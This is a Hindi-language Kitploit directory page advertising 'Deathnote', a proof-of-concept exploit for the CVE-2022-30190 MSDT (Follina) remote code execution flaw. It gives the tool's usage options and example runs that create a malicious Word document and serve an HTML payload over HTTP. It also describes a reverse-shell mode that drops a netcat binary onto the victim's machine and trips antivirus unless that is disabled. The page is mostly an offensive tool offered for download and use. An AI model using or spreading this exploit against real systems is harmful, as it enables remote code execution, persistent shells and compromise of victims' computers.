Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Deathnote — Proof of Concept of CVE-2022-30190 | Kitploit
उपकरण/GitHubGitHub/malwareman007/deathnote
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubmalwareman007/deathnote

Deathnote

Proof of Concept of CVE-2022-30190

रिपॉजिटरी देखें
3863 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Deathnote

CVE-2022-30190 का प्रूफ ऑफ कॉन्सेप्ट

जब MSDT को Word जैसे कॉलिंग एप्लिकेशन से URL प्रोटोकॉल का उपयोग करके बुलाया जाता है, तो एक रिमोट कोड निष्पादन भेद्यता मौजूद होती है। इस भेद्यता का सफलतापूर्वक शोषण करने वाला हमलावर कॉलिंग एप्लिकेशन के विशेषाधिकारों के साथ मनमाना कोड चला सकता है। हमलावर तब उपयोगकर्ता के अधिकारों द्वारा अनुमत संदर्भ में प्रोग्राम स्थापित कर सकता है, डेटा देख, बदल या हटा सकता है, या नए खाते बना सकता है।


एक दुर्भावनापूर्ण Microsoft Word दस्तावेज़ के साथ "Deathnote" MS-MSDT हमला बनाएं और एक HTTP सर्वर के साथ पेलोड को स्टेज करें।

उपयोग

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: Notepad)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./Deathnote.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

उदाहरण

notepad.exe चलाएं:

root@kitploit:~
$ python3 Deathnote.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000

calc.exe चलाएं:

root@kitploit:~
$ python3 Deathnote.py -c "calc"

demo

पोर्ट 4444 पर एक रिवर्स शेल प्राप्त करें। नोट: यह पीड़ित पर एक netcat बाइनरी डाउनलोड करता है और इसे C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता है। यह एंटीवायरस डिटेक्शन को ट्रिगर करेगा जब तक कि AV अक्षम न किया गया हो।

reverse shell प्राप्त करें:

root@kitploit:~
python3 Deathnote.py -p 1234
टूल डाउनलोड करें